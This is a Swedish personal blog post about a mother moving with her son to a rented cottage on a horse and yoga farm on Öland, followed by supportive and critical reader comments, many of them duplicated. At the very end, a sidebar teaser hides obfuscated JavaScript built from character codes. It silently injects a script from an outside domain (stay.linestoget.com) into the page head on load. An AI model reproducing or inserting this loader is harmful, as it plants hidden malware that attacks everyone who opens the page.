Kollbergården, nu kommer vi =)

Nu går flyttlasset. Eller det är lite utdraget.

Vid månadsskiftet ska lägenheten på Öland vara tom! Många av er har väntat på att jag ska berätta om min kommande flytt. 

Spekulationerna har figurerat och jag kan nu berätta att vi hittat vårat DRÖMBOENDE! 

OLYMPUS DIGITAL CAMERA

OLYMPUS DIGITAL CAMERA

Men, vi backar bandet och hoppar tilllbaka tills i Juli när vi lämnade Sigtuna för att förbereda skolstarten för Ludvig. Dubbla känslor då jag har mitt jobb, liv och familj i Stockholm . Jag är ligger på kontrakt där i  minst tre år!

Plus att jag själv inte är från Öland från början och har haft en hel del tuffa perioder där.

Ingen av er kände till Jonas då, Vi var fortfarande relativt ”nya” och att redan då sättas i en prövning där jag säger

-”Älskling, vi måste flytta till öland nu”.

Det är ingen självklar situation.

Men han bevisade mer än någonsin att han fanns där. För mig, för Ludvig… För OSS! ❤️

-Tack Jonas för att du är DU!

OLYMPUS DIGITAL CAMERA

Vi kommer att leva i ett pendlings förhållande med dubbla boenden, dubbla kostnader, långa restider, omställningar och allt vad det innebär.

MEN, vi grejade det! Vi är Förlovade, med bröllopsplaner och en ljus framtidstro där vi vill bygga familj tillsammans.

Jag och min Indian❤️

Ludvig och Jonas har fått en otroligt fin relation, Det min kära cybervän betyder enormt mycket för mig🙏🏻

Jag flyttade ner till Öland UTAN att tittat på lägenheten innan. Det var ingen bra ide! 🙈

Lägenheten har vi nämligen inte trivts i. Opersonlig, halvdeffekt och ganska ”murrig” . Haha! Jag sätter igång brandlarmet VARJE gång jag steker mat😝 Finns nämligen ingen fläkt i dessa lägenheter. ( Sorry grannarna)

Men inget ont som inte har något gott med sig. Vi kunde landa där, en vänskap har vuxit fram med en av mina grannar…. 💖 och vi har kunnat utgå därifrån under tiden som jag letat. 

 Jag har letat och letat. Varit på visning efter visning och för att hitta det” perfekta” boendet. Nu har vi gjort det. Spartanskt, enkelt, lantligt och helt idylliskt! 🙏🏻

Jag satt hos Bobby nyligen och träffade en mycket inspirerande kvinna. Äldre än mig själv, men med barn, företag och erfarenheter av med och motgång. Denna kvinna pendlar mellan Stockholm och London. Hon gav mig sina personliga tips på hur hon får det att fungera. Dessa tar jag med mig och DIREKT när denna flytten är över så ska jag börja använda dom!

Min son är mitt allt, för att detta ska vara hållbart i längden så behöver  vi effektivisera oss, och göra det så ”enkelt” som möjligt rent praktiskt. MEN, det är också viktigt att det KÄNNS bra. Speciellt för mig som tampas med depression/ångest.

ÄNTLIGEN kan jag säga att vi hittat ”hem” i våran minst sagt annorlunda situation.

Man vet ju såklart aldrig innan man har bott in sig.. Men det känns bra. I magen och i själen.  Vi flyttar ut till ett mysigt Torp på Kollberggården.

Här är min utsikt: 

OLYMPUS DIGITAL CAMERA

Kollbergården ligger bara ca 12 min från där vi bor idag.

Men på landet. vacker miljö, en egen stor pulkabacke i närheten. 1.8km promenad avstånd ner till en lugn och oförstörd strand. Höns, hästar och hundar på gården.

 Här får du se en bid utifrån. Fler bild kommer såklart! 

 Men inte bara det….

65714193-F9F2-4D69-AC48-47BD6D97EE66

Kollbergården är en kursgård med Islandshästar och en helt nybyggd Yoga Studio.

-Men hallå?! Hur perfekt är inte detta?!

Malin heter kvinnan som driver Gården. När jag träffade henne första gången så kändes det bara SÅ rätt. harmoniskt, lugnt och alldeles alldeles UNDERBART!

När jag kliver ur bilen i Kleva (området heter så) Så blir jag lugn inombords… Det är så levande och stillsamt på samma gång. Luften är ren och det är en otrolig kontrast till vårat Stockholms liv. 

3EE9B1EB-61E5-43ED-A500-63CE1C8ADD3D

Ludvig ser verkligen fram emot flytten. Jonas är super positiv och snaaaart ska även han få komma ner och titta.

MEN, just nu är jag lite inklämd mellan allt. Jonas lägenhet renoveras. Dom flesta av mina möbler passar inte i torpet, så dessa ska vi ha i Jonas lägenhet.

Jag har beställt en del nya möbler till torpet. Jag behöver tänka extremt praktiskt då det är kompakt-living som gäller! 

Jag ska passa på att bli lite minimalistisk samtidigt tänkte jag… 😂🙈😉

Men allting hänger ihop. Jonas lägenhet måste vara relativt ”klar” för att mina möbler ska kunna komma in där. Min lägenhet ska vara tom, och mitt bohag ska till TRE ställen. Stockholm , torpet och en del magasinseras i min fars hus i Småland. haha! Rörigt värre! Den logistiken är inte att leka men. Men, TACK och LOV så fick jag komma in i torpet lite tidigare.. Det räddar mig! 

MEN, nu måste jag logga ut. För jag ska strax åka iväg och ta emot en möbelleverans. Sen ska jag måla Ludvigs platsbyggda våningssäng. 

 Imorgon ska han till sin pappa, dom ska på semester till deras hem på Teneriffa (dom pendlar dit… hehe!)

Därför ska jag passa på att göra det mesta klart undee tiden som han är iväg i värmen och badar och busar! 

Så nu får du hänga med mig på alla plan. Flyttkaos deluxe!

OLYMPUS DIGITAL CAMERA

Men det kommer bli SÅ bra i slutändan! Jag har inte slutat med min utmaning.

Jag krigar på, det hoppas jag att DU också gör! MEN jag hinner inte med att peppa dig så mycket som jag vill just nu.

Måste ”överleva” dom närmaste två veckorna. Håll ut, våga utmana dig själv. Använd dom tre helkropps passen jag lagt upp. Testa dig igenom mina olika övningar och håll efter kosten, så lägger vi i en växel till när jag ”landat”.

Flera av er önskar smoothie recept . Samma ska där.. absolut, EFTER flytten!😃

Jag ska tur/retur sthlm fyra gånger! Min pappa kommer ner och tar det ”stora” lasset nästa helg! Så jag har ca 1 vecka på mig att fixa allt!

Jag är mitt emellan kurser i utbildningen just nu. Så jag passade på att hoppa över nästa kursstart vilket ger mig några veckors andrum, under flytten… Innan nästa kursstart börjar!

-SÅ SKÖNT!

 Stor kram och TACK för att DU finns!

/ My Martens 

bild-4608

PS: Till alla er som skriver en massa elaka kommentarer både här inne och hos CamCam.

NEJ, jag kommer ALDRIG att överge mig son! Jag jobbar mer än gärna dubbel under hans uppväxt för att finansiera detta, och fortsätter att vända ut och in på mig själv för att göra det bästa av situationen!

Till er som påstod bla, att jag gjorde ett halvdant försök med att flytta ner till öland eller att det var ett pr-trick! Skäms på er, era fördomsfulla elakingar!

 Att ni OM och OM igen klankar ner på mig som mamma säger ärligt talat mer om er än om mig!

-over & out!

157 Komentarer

 1. En STOR ELOGE till dig My?? som fixar o trixar, ALLT för din sons skull! Beundransvärt! Mycket jobb för dig, hoppas du får tid för återhämtning när allt är klart!

 2. Yes! Jag visste det <3 så strongt av dig… å det å veta så många skriver en massa skit… måste tära men du är stark som en oxe å klok som en bok, My heja dig ska bli kul å få fortsätta följa din/eran resa…
  Kram Monica

 3. Lycka till?. Kommer bli kanon. Vilken lycka att få bo så.
  Hade ja varit du hade ja tagit en flyttbuss som åker 1 gång till Stockholm. Kostar mer men den tid och bensinpengar.
  Lycka till igen. Kram

 4. En STOR ELOGE till dig My😘👏 som fixar o trixar, ALLT för din sons skull! Beundransvärt! Mycket jobb för dig, hoppas du får tid för återhämtning när allt är klart!

 5. Hej My? Jag vill bara önska dig lycka till med allt. Ser väldigt mysigt ut. Skit i elaka människor, det tar ju aldrig slut, fattar inte att dom har mage att kritisera dig som mamma. Allt löser sig, men va rädd om dig. Kram från mig?

 6. Yes! Jag visste det <3 så strongt av dig… å det å veta så många skriver en massa skit… måste tära men du är stark som en oxe å klok som en bok, My heja dig ska bli kul å få fortsätta följa din/eran resa…
  Kram Monica

 7. Lycka till😊. Kommer bli kanon. Vilken lycka att få bo så.
  Hade ja varit du hade ja tagit en flyttbuss som åker 1 gång till Stockholm. Kostar mer men den tid och bensinpengar.
  Lycka till igen. Kram

 8. Kära My. Jag hoppas detta boende fungerar för dig nu. Det blir ju förstås mycket pendlande o stress, så jag hoppas du inte lurar dig själv med detta. Man griper ju ofta dom halmstrån som finns. Men förhoppningsvis kan ni finna ro o harmoni i torpet, i alla fall på er ledighet. Kanske är det ett framtida fritidsboende som du nu köper. Jag förstår såväl att du inte vill minska tiden m Ludvig, men är bara rädd att du bränner ut dig själv på kuppen. Lycka till med allt.
  ( detta skrivet av en tant i all välmening. )

  • Tack för omtanken ??❤️ Finna inga alternativ, jobbet är låst i Sthlm i tre år. Jag kommer aldrig att ha Ludvig varannan helg. Så då får vi kombinera ☺️

 9. Hej My? att du är en bra mamma ,det känns genom bloggen,? de som tvivlar på det, tror jag vill att det det ska vara så, kram och lycka till med allt; vad fint det ser ut dit ni ska flytta: En idyll?

 10. Grattis till ditt nya boende både på Öland och i Stockholm. Ja, nya och nya hos Jonas, men i alla fall nyrenoverade. Vilket fint torp du hittat. Rena idyllen! Med djur och natur. Verkligen mysigt.
  Kram

 11. Hej My😊 Jag vill bara önska dig lycka till med allt. Ser väldigt mysigt ut. Skit i elaka människor, det tar ju aldrig slut, fattar inte att dom har mage att kritisera dig som mamma. Allt löser sig, men va rädd om dig. Kram från mig💕

 12. Grattis till ditt nya boende kommer att passa dig nära till naturen och härliga hästar kommer sakna dig men vi ses nog kram ?????

 13. Finaste. Va skönt att ni hittat ert lilla paradis. Så fint det ser ut och lugnet inpå knuten.
  Allt löser sig, men om folk kunde ge fan i att vara så otroligt elaka med sina urdumma kommentarer, så skulle det gå lättare…
  Heja er lilla familjen
  Kram o trevlig helg

 14. Kära My. Jag hoppas detta boende fungerar för dig nu. Det blir ju förstås mycket pendlande o stress, så jag hoppas du inte lurar dig själv med detta. Man griper ju ofta dom halmstrån som finns. Men förhoppningsvis kan ni finna ro o harmoni i torpet, i alla fall på er ledighet. Kanske är det ett framtida fritidsboende som du nu köper. Jag förstår såväl att du inte vill minska tiden m Ludvig, men är bara rädd att du bränner ut dig själv på kuppen. Lycka till med allt.
  ( detta skrivet av en tant i all välmening. )

  • Tack för omtanken 🙏🏻❤️ Finna inga alternativ, jobbet är låst i Sthlm i tre år. Jag kommer aldrig att ha Ludvig varannan helg. Så då får vi kombinera ☺️

 15. Jag vet många som pendlar till jobbet från Kalmar till Sthlm .. ja dom flyger så klart och det kostar ju en del. Men det finns möjligheter för er i alla fall.

    • C.S ! Utseende för det yrket ?? eventuellt kunde utseendet påverka chansen att bli flygvärdinna på 50-talet men numera går man på kompetens . Utstrålning är så klart ett plus i samband med utbildning men vad ska man ha för utseende för att passa till det yrket ? och vem avgör vad som är rätt utseende ? ? Jag som reser mycket vill hellre ha en skicklig värdinna en en som har ett visst utseende ? Men säkert skulle My fixa den utbildningen !

 16. Hej My😘 att du är en bra mamma ,det känns genom bloggen,😘 de som tvivlar på det, tror jag vill att det det ska vara så, kram och lycka till med allt; vad fint det ser ut dit ni ska flytta: En idyll😘

 17. Du gör mig glad! För varje steg Du tar så kommer Du allt närmare Ert mål! Vilken rikedom Du har som funnit en kärlek för både Dig och Ludvig.
  Lycka till! Glöm inte bort att bromsa in lite….
  Torpet-en idyll!

 18. Mysigt, härligt att bo så. Men var du redan ihop med Jonas när du flyttade till öland verkligen? Men inte redan när den flytten bestämdes väl? Så du har letat nytt boende på öland länge och varit på visning efter visning, trodde detta kom ganska plötsligt på. Då får Kollberggården bra pr också genom att du bor hos dem. Drömmigt att både bo i storstaden och torp på landet, lite avis ? Lycka till!

 19. Grattis till ditt nya boende både på Öland och i Stockholm. Ja, nya och nya hos Jonas, men i alla fall nyrenoverade. Vilket fint torp du hittat. Rena idyllen! Med djur och natur. Verkligen mysigt.
  Kram

 20. Grattis till ditt nya boende kommer att passa dig nära till naturen och härliga hästar kommer sakna dig men vi ses nog kram 👍😁💗💖😍

 21. Hoppas verkligen det blir bra för er alla ?❤️ Tycker du är fantastisk som kämpar och försöker hitta lösningar. Man ska aldrig döma någon annan om man inte själv vart i samma situation…….och kanske inte ens om man har varit det för vi är alla olika individer med olika förutsättningar.
  Helt fantastisk också att Jonas dyker upp precis i rätt tid och passar in så perfekt ?❤️.
  Härligt när det blir som det ska till slut ??
  All lycka till er.
  Kram

 22. Finaste. Va skönt att ni hittat ert lilla paradis. Så fint det ser ut och lugnet inpå knuten.
  Allt löser sig, men om folk kunde ge fan i att vara så otroligt elaka med sina urdumma kommentarer, så skulle det gå lättare…
  Heja er lilla familjen
  Kram o trevlig helg

 23. Jag vet många som pendlar till jobbet från Kalmar till Sthlm .. ja dom flyger så klart och det kostar ju en del. Men det finns möjligheter för er i alla fall.

  • Ja, för 32000:- /månaden 💸💸💸 Typiskt! Jag har erbjudit mig att jobba på resorna som servitris 😂 Men det gick inte hem…. dessvärre! 🙈

    • C.S ! Utseende för det yrket ?? eventuellt kunde utseendet påverka chansen att bli flygvärdinna på 50-talet men numera går man på kompetens . Utstrålning är så klart ett plus i samband med utbildning men vad ska man ha för utseende för att passa till det yrket 😀 och vem avgör vad som är rätt utseende ? 🙂 Jag som reser mycket vill hellre ha en skicklig värdinna en en som har ett visst utseende 🙂 Men säkert skulle My fixa den utbildningen !

 24. Du gör mig glad! För varje steg Du tar så kommer Du allt närmare Ert mål! Vilken rikedom Du har som funnit en kärlek för både Dig och Ludvig.
  Lycka till! Glöm inte bort att bromsa in lite….
  Torpet-en idyll!

 25. Mysigt, härligt att bo så. Men var du redan ihop med Jonas när du flyttade till öland verkligen? Men inte redan när den flytten bestämdes väl? Så du har letat nytt boende på öland länge och varit på visning efter visning, trodde detta kom ganska plötsligt på. Då får Kollberggården bra pr också genom att du bor hos dem. Drömmigt att både bo i storstaden och torp på landet, lite avis 😉 Lycka till!

 26. Så fint boende det kommer att bli
  superbra när allt är klart.
  Och sen tror jag inte att du behöver
  vara så orolig längre vad CamCam
  skriver hon har fullt upp med andra offer numera.
  Sorglig människa hon mår säkert toppenbra ?

 27. Hoppas verkligen det blir bra för er alla 😊❤️ Tycker du är fantastisk som kämpar och försöker hitta lösningar. Man ska aldrig döma någon annan om man inte själv vart i samma situation…….och kanske inte ens om man har varit det för vi är alla olika individer med olika förutsättningar.
  Helt fantastisk också att Jonas dyker upp precis i rätt tid och passar in så perfekt 😊❤️.
  Härligt när det blir som det ska till slut 😊👍
  All lycka till er.
  Kram

 28. Torp is ”da shit” ? bor själv i ett och det är helt underbart, frihet med naturen in på knuten. Kan få ett och annat pms utbrott pga dålig förvaring/trångt men friheten, naturen, landet, mysfaktorn mm väger upp <3. Och det ultimata är ju som ni gör lägenhet i kombination med stuga. Det bästa av två världar. Lycka till kram

 29. Så fint boende det kommer att bli
  superbra när allt är klart.
  Och sen tror jag inte att du behöver
  vara så orolig längre vad CamCam
  skriver hon har fullt upp med andra offer numera.
  Sorglig människa hon mår säkert toppenbra 🙂

 30. Torp is ”da shit” 🙂 bor själv i ett och det är helt underbart, frihet med naturen in på knuten. Kan få ett och annat pms utbrott pga dålig förvaring/trångt men friheten, naturen, landet, mysfaktorn mm väger upp <3. Och det ultimata är ju som ni gör lägenhet i kombination med stuga. Det bästa av två världar. Lycka till kram

 31. Grattis till ert nya boende. Ni kommer stortrivas där. Du är en riktig kämpe. Så glad Jonas och du funnit varann. Han verkar vara en toppenkille. Det är du värd. Kram ☺️

 32. Grattis till ert nya boende. Ni kommer stortrivas där. Du är en riktig kämpe. Så glad Jonas och du funnit varann. Han verkar vara en toppenkille. Det är du värd. Kram ☺️

 33. Åh vad mysigt det verkar vara där. 😊 du är en fantastisk mamma till din lille vapendragare 😘. Ha en fin helg kära du. Kram Sara 💕

 34. Grattis till det fina boendet, hoppas ni kommer att trivas. Det är en campingstuga ni hyr där då, för jag såg att man kunde det vilket är faktiskt med den miljön. Hur stor är stugan ni hyr?

  • Camping? Nej, vi flyttar till en islandshästgård. Ett torp som vi hyr. Det finns boenden i anslutning till yoga studion, där kan du hyra om du vill ☺️ Dom hyra ut i samband med hälsoretreat. Då kanske din ständigt syrliga ton försvinner om du pratat med mig irl? ?

 35. Grattis till det fina boendet, hoppas ni kommer att trivas. Det är en campingstuga ni hyr där då, för jag såg att man kunde det vilket är faktiskt med den miljön. Hur stor är stugan ni hyr?

  • Camping? Nej, vi flyttar till en islandshästgård. Ett torp som vi hyr. Det finns boenden i anslutning till yoga studion, där kan du hyra om du vill ☺️ Dom hyra ut i samband med hälsoretreat. Då kanske din ständigt syrliga ton försvinner om du pratat med mig irl? 😂

   • Hon är direkt elak och gränslös och drar in Mys son i sina kommentarer, ifrågasätter henne som mamma.
    Hon mobbar Tyra på det grövsta. Förtal tror jag att det kallas?
    Har aldrig läst någon, som dessutom är anställd som ”journalist” som är så gränslöst elak som hon.
    Har du ens läst hur människan uttrycker sig?

 36. 32000 i månaden att flyga !!!!! Är det varje dag eller 2 veckor i månaden? Jag flyger aldrig själv så jag har ingen aning. Kan man köpa typ klippkort? Kan man ta tåget? Ska ni åka bil eller annat? Vill belysa att det är bara nyfikna frågor och ingen baktanke. Jag är inte sån som vissa är utan frågar jag, så undrar jag och inget mer med det. Förstår förövrigt inte folk som klankar ner på andra. Ställer man en fråga önskar man svar, men man får vara förstående om man inget får. Frågar gör man väl för att man är nyfiken och inte vet. Jag har även funderingar över L.s pappa. Bestämmer han allt eller delar ni på bestämmandet?
  Vet att sånt kan vara svårt.
  Ha det gött.

   • Hon är direkt elak och gränslös och drar in Mys son i sina kommentarer, ifrågasätter henne som mamma.

    Hon mobbar Tyra på det grövsta. Förtal tror jag att det kallas?

    Har aldrig läst någon, som dessutom är anställd som ”journalist” som är så gränslöst elak som hon.

    Har du ens läst hur människan uttrycker sig?

 37. 32000 i månaden att flyga !!!!! Är det varje dag eller 2 veckor i månaden? Jag flyger aldrig själv så jag har ingen aning. Kan man köpa typ klippkort? Kan man ta tåget? Ska ni åka bil eller annat? Vill belysa att det är bara nyfikna frågor och ingen baktanke. Jag är inte sån som vissa är utan frågar jag, så undrar jag och inget mer med det. Förstår förövrigt inte folk som klankar ner på andra. Ställer man en fråga önskar man svar, men man får vara förstående om man inget får. Frågar gör man väl för att man är nyfiken och inte vet. Jag har även funderingar över L.s pappa. Bestämmer han allt eller delar ni på bestämmandet?
  Vet att sånt kan vara svårt.
  Ha det gött.

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/